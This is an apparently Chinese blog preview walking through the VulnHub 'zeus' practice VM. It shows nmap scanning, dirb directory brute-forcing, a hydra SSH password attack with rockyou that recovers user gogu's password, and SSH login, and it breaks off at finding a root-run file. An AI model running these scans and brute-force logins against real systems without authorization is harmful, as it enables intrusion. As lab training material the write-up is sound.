文章预览
本周实践的是vulnhub的zeus镜像, 下载地址,https://download.vulnhub.com/zeus/zeus-ovf.zip, 用workstation导入成功, 由于靶机用的是静态地址192.168.131.170, 在workstation里修改nat模式的dhcp地址池为192.168.131.0/24, 这样就能让kali攻击机分配到跟靶机同网段的地址, 对靶机做端口扫描sudo nmap -sS -sV -T5 -A -p- 192.168.131.170, 获取到靶机开放了22端口的ssh服务和80端口的http服务, 对http服务做路径暴破, dirb http://192.168.131.170 /usr/share/wordlists/dirb/big.txt, 获取到http://192.168.131.170/telecom, 浏览器访问http://192.168.131.170/telecom, 发现是空白页面,查看页面源码获取到用户名gogu, 对gogu用户做ssh登录密码的暴破, hydra -l gogu -P /usr/share/wordlists/rockyou.txt 192.168.131.170 ssh,获取到密码universal, ssh登录到靶机,ssh gogu@192.168.131.170, 递归查询隐藏文件,ls -lRah,获取到root权限执行的sysdate,
………………………………